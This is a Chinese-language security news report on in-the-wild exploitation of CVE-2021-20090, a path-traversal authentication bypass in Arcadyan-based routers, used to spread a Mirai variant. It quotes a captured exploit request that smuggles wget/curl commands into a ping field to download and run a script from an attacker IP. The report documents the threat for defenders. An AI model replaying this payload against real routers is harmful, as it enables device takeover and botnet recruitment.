《電子技術應用》
您所在的位置:首頁 > 通信與網(wǎng)絡 > 業(yè)界動態(tài) > 9.9分漏洞在野利用

9.9分漏洞在野利用

2021-08-21
來源:嘶吼專業(yè)版
關鍵詞: 9.9分漏洞 路由器

  研究人員發(fā)現(xiàn)9.9分漏洞在野利用,數(shù)百萬路由器設備受到影響。

  CVE-2021-20090漏洞

  CVE-2021-20090漏洞是Tenable研究人員8月3日公開的包含Arcadyan固件的路由器web接口路徑遍歷漏洞,CVSS評分9.9分。漏洞影響數(shù)百萬家用路由器設備和其他使用有漏洞的代碼庫的物聯(lián)網(wǎng)設備,包括部分互聯(lián)網(wǎng)服務提供商在內(nèi)的不少于17家廠商的產(chǎn)品受到影響。

  CVE-2021-20090漏洞是一個路徑遍歷漏洞,可能引發(fā)認證繞過。成功利用該漏洞后,攻擊者可以完全接管有漏洞的設備。比如,Tenable研究人員已經(jīng)證明了如何在有漏洞的路由器上修改配置以啟用Telnet,并獲取訪問設備的root級shell訪問權限。

  cve-2021-20090漏洞的技術細節(jié)參見:

  https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2

  在野漏洞利用

  Juniper安全研究人員在監(jiān)控一起惡意網(wǎng)絡活動流量時發(fā)現(xiàn)嘗試利用該漏洞的攻擊模式。攻擊者看似嘗試在受影響的路由器上使用腳本的方式來部署Mirai惡意軟件變種。

  研究人員從今年2月18日開始監(jiān)控到該攻擊活動,原始的攻擊來源與IP地址27.22.80[.]19,通過HTTP POST方法:

  POST /images/%2fapply_abstract.cgi HTTP/1.1

  Connection: close

  User-Agent: Darkaction=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A

  wget+http://212.192.241.72/lolol.sh;

  curl+-O+http://212.192.241.72/lolol.sh;

  chmod+777+lolol.sh;

  sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

  從該POST 請求中可以看出,攻擊者修改了被攻擊設備的配置信息使用“ARC_SYS_TelnetdEnable=1”來啟用Telnet,然后使用wget或curl從IP 地址212.192.241[.]72 處下載一個新的腳本,然后執(zhí)行。研究人員分析該腳本payload并確認是Mirai僵尸網(wǎng)絡變種。

  從6月6日到7月23日,研究人員發(fā)現(xiàn)攻擊者開始利用其它的漏洞:

  CVE-2020-29557 (DLink路由器)

  CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)

  CVE-2021-31755  (Tenda AC11)

  CVE-2021-22502 (MicroFocus OBR)

  CVE-2021-22506 (MicroFocus AM)

  這表明該攻擊組織正通過添加新的漏洞利用不斷擴展其攻擊活動。




電子技術圖片.png

本站內(nèi)容除特別聲明的原創(chuàng)文章之外,轉(zhuǎn)載內(nèi)容只為傳遞更多信息,并不代表本網(wǎng)站贊同其觀點。轉(zhuǎn)載的所有的文章、圖片、音/視頻文件等資料的版權歸版權所有權人所有。本站采用的非本站原創(chuàng)文章及圖片等內(nèi)容無法一一聯(lián)系確認版權者。如涉及作品內(nèi)容、版權和其它問題,請及時通過電子郵件或電話通知我們,以便迅速采取適當措施,避免給雙方造成不必要的經(jīng)濟損失。聯(lián)系電話:010-82306118;郵箱:aet@chinaaet.com。